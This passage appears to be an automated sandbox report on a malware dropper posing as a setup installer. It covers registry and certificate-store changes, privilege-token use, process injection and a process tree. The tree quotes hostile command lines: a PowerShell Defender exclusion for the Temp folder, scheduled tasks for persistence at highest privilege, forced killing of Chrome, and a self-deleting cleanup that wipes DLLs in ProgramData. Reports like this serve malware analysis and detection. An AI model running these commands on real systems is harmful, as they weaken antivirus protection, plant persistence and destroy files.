Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 19002f433a5c000000000000000000000000000000000000000000 Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 -
Processes:
Tue029560e6534e190c.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Tue029560e6534e190c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Tue029560e6534e190c.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid process 2264 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Tue02522f9ea0b1.exepowershell.exepid process 1788 Tue02522f9ea0b1.exe 1788 Tue02522f9ea0b1.exe 1820 powershell.exe 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 1820 powershell.exe 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 1820 powershell.exe 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 2264 -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Tue026e182673.exepid process 2264 3176 Tue026e182673.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
Tue02522f9ea0b1.exepid process 1788 Tue02522f9ea0b1.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
chrome.exepid process 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Tue02dc626f48.exeTue02976fcdf1.exeTue02705f9c2b455.exepowershell.exetaskkill.exedescription pid process Token: SeCreateTokenPrivilege 1808 Tue02dc626f48.exe Token: SeAssignPrimaryTokenPrivilege 1808 Tue02dc626f48.exe Token: SeLockMemoryPrivilege 1808 Tue02dc626f48.exe Token: SeIncreaseQuotaPrivilege 1808 Tue02dc626f48.exe Token: SeMachineAccountPrivilege 1808 Tue02dc626f48.exe Token: SeTcbPrivilege 1808 Tue02dc626f48.exe Token: SeSecurityPrivilege 1808 Tue02dc626f48.exe Token: SeTakeOwnershipPrivilege 1808 Tue02dc626f48.exe Token: SeLoadDriverPrivilege 1808 Tue02dc626f48.exe Token: SeSystemProfilePrivilege 1808 Tue02dc626f48.exe Token: SeSystemtimePrivilege 1808 Tue02dc626f48.exe Token: SeProfSingleProcessPrivilege 1808 Tue02dc626f48.exe Token: SeIncBasePriorityPrivilege 1808 Tue02dc626f48.exe Token: SeCreatePagefilePrivilege 1808 Tue02dc626f48.exe Token: SeCreatePermanentPrivilege 1808 Tue02dc626f48.exe Token: SeBackupPrivilege 1808 Tue02dc626f48.exe Token: SeRestorePrivilege 1808 Tue02dc626f48.exe Token: SeShutdownPrivilege 1808 Tue02dc626f48.exe Token: SeDebugPrivilege 1808 Tue02dc626f48.exe Token: SeAuditPrivilege 1808 Tue02dc626f48.exe Token: SeSystemEnvironmentPrivilege 1808 Tue02dc626f48.exe Token: SeChangeNotifyPrivilege 1808 Tue02dc626f48.exe Token: SeRemoteShutdownPrivilege 1808 Tue02dc626f48.exe Token: SeUndockPrivilege 1808 Tue02dc626f48.exe Token: SeSyncAgentPrivilege 1808 Tue02dc626f48.exe Token: SeEnableDelegationPrivilege 1808 Tue02dc626f48.exe Token: SeManageVolumePrivilege 1808 Tue02dc626f48.exe Token: SeImpersonatePrivilege 1808 Tue02dc626f48.exe Token: SeCreateGlobalPrivilege 1808 Tue02dc626f48.exe Token: 31 1808 Tue02dc626f48.exe Token: 32 1808 Tue02dc626f48.exe Token: 33 1808 Tue02dc626f48.exe Token: 34 1808 Tue02dc626f48.exe Token: 35 1808 Tue02dc626f48.exe Token: SeDebugPrivilege 1624 Tue02976fcdf1.exe Token: SeDebugPrivilege 1416 Tue02705f9c2b455.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeDebugPrivilege 1480 taskkill.exe Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 Token: SeShutdownPrivilege 2264 Token: SeCreatePagefilePrivilege 2264 -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exechrome.exepid process 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 3464 taskmgr.exe 3464 taskmgr.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exechrome.exepid process 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 3464 taskmgr.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 3464 taskmgr.exe 3464 taskmgr.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 4712 chrome.exe 3464 taskmgr.exe 4712 chrome.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid process 2264 2264 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3524 wrote to memory of 2072 3524 setup_x86_x64_install.exe setup_installer.exe PID 3524 wrote to memory of 2072 3524 setup_x86_x64_install.exe setup_installer.exe PID 3524 wrote to memory of 2072 3524 setup_x86_x64_install.exe setup_installer.exe PID 2072 wrote to memory of 2456 2072 setup_installer.exe setup_install.exe PID 2072 wrote to memory of 2456 2072 setup_installer.exe setup_install.exe PID 2072 wrote to memory of 2456 2072 setup_installer.exe setup_install.exe PID 2456 wrote to memory of 376 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 376 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 376 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 416 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 416 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 416 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 1032 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 1032 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 1032 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3628 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3628 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3628 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3604 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3604 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3604 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3592 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3592 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3592 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3596 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3596 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3596 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3612 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3612 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3612 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3640 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3640 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3640 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3656 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3656 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3656 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3668 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3668 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3668 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3572 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3572 2456 setup_install.exe cmd.exe PID 2456 wrote to memory of 3572 2456 setup_install.exe cmd.exe PID 3596 wrote to memory of 1344 3596 cmd.exe Tue026e94a5005f8.exe PID 3596 wrote to memory of 1344 3596 cmd.exe Tue026e94a5005f8.exe PID 3596 wrote to memory of 1344 3596 cmd.exe Tue026e94a5005f8.exe PID 1032 wrote to memory of 1348 1032 cmd.exe Tue028a363eda.exe PID 1032 wrote to memory of 1348 1032 cmd.exe Tue028a363eda.exe PID 1032 wrote to memory of 1348 1032 cmd.exe Tue028a363eda.exe PID 3612 wrote to memory of 1416 3612 cmd.exe Tue02705f9c2b455.exe PID 3612 wrote to memory of 1416 3612 cmd.exe Tue02705f9c2b455.exe PID 3572 wrote to memory of 4076 3572 cmd.exe Tue0289c99651.exe PID 3572 wrote to memory of 4076 3572 cmd.exe Tue0289c99651.exe PID 3628 wrote to memory of 1624 3628 cmd.exe Tue02976fcdf1.exe PID 3628 wrote to memory of 1624 3628 cmd.exe Tue02976fcdf1.exe PID 3640 wrote to memory of 4092 3640 cmd.exe Tue02b2110095fe706.exe PID 3640 wrote to memory of 4092 3640 cmd.exe Tue02b2110095fe706.exe PID 3640 wrote to memory of 4092 3640 cmd.exe Tue02b2110095fe706.exe PID 416 wrote to memory of 1788 416 cmd.exe Tue02522f9ea0b1.exe PID 416 wrote to memory of 1788 416 cmd.exe Tue02522f9ea0b1.exe PID 416 wrote to memory of 1788 416 cmd.exe Tue02522f9ea0b1.exe PID 3668 wrote to memory of 4080 3668 cmd.exe Tue029560e6534e190c.exe PID 3668 wrote to memory of 4080 3668 cmd.exe Tue029560e6534e190c.exe PID 3668 wrote to memory of 4080 3668 cmd.exe Tue029560e6534e190c.exe PID 3604 wrote to memory of 4072 3604 cmd.exe Tue02520f255d0ba43a.exe
Processes
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue026e182673.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue026e182673.exeTue026e182673.exe /mixone5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 6566⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 6726⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 7726⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 8086⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 8406⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 9206⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 11766⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 13126⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 12726⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 6526⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0289c99651.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue0289c99651.exeTue0289c99651.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue029560e6534e190c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue029560e6534e190c.exeTue029560e6534e190c.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 15166⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02b2110095fe706.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue02b2110095fe706.exeTue02b2110095fe706.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-BVNOM.tmp\Tue02b2110095fe706.tmp"C:\Users\Admin\AppData\Local\Temp\is-BVNOM.tmp\Tue02b2110095fe706.tmp" /SL5="$10264,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue02b2110095fe706.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02705f9c2b455.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue02705f9c2b455.exeTue02705f9c2b455.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue026e94a5005f8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02dc626f48.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue02dc626f48.exeTue02dc626f48.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02520f255d0ba43a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS81843C7D\Tue02520f255d0ba43a.exeTue02520f255d0ba43a.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\9mY462s3yTdWVJsdLMD2MXyO.exe"C:\Users\Admin\Pictures\Adobe Films\9mY462s3yTdWVJsdLMD2MXyO.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\vCQgq7S2ZR5kmKXJxq9g1Aqw.exe"C:\Users\Admin\Pictures\Adobe Films\vCQgq7S2ZR5kmKXJxq9g1Aqw.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\oyegtY53s0CdlHuDdQpptyQm.exe"C:\Users\Admin\Documents\oyegtY53s0CdlHuDdQpptyQm.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\ubrjWwfuEHnRNOnZpk9eDJlq.exe"C:\Users\Admin\Pictures\Adobe Films\ubrjWwfuEHnRNOnZpk9eDJlq.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im ubrjWwfuEHnRNOnZpk9eDJlq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ubrjWwfuEHnRNOnZpk9eDJlq.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ubrjWwfuEHnRNOnZpk9eDJlq.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\9OdO8v0parg16SfLr5bMHdbP.exe"C:\Users\Admin\Pictures\Adobe Films\9OdO8v0parg16SfLr5bMHdbP.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\m1LmhXPvGOQoiSspKdgH5n4Q.exe"C:\Users\Admin\Pictures\Adobe Films\m1LmhXPvGOQoiSspKdgH5n4Q.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\4pBmbd6nkTbnGxGqVjb2dDx6.exe"C:\Users\Admin\Pictures\Adobe Films\4pBmbd6nkTbnGxGqVjb2dDx6.exe"6⤵
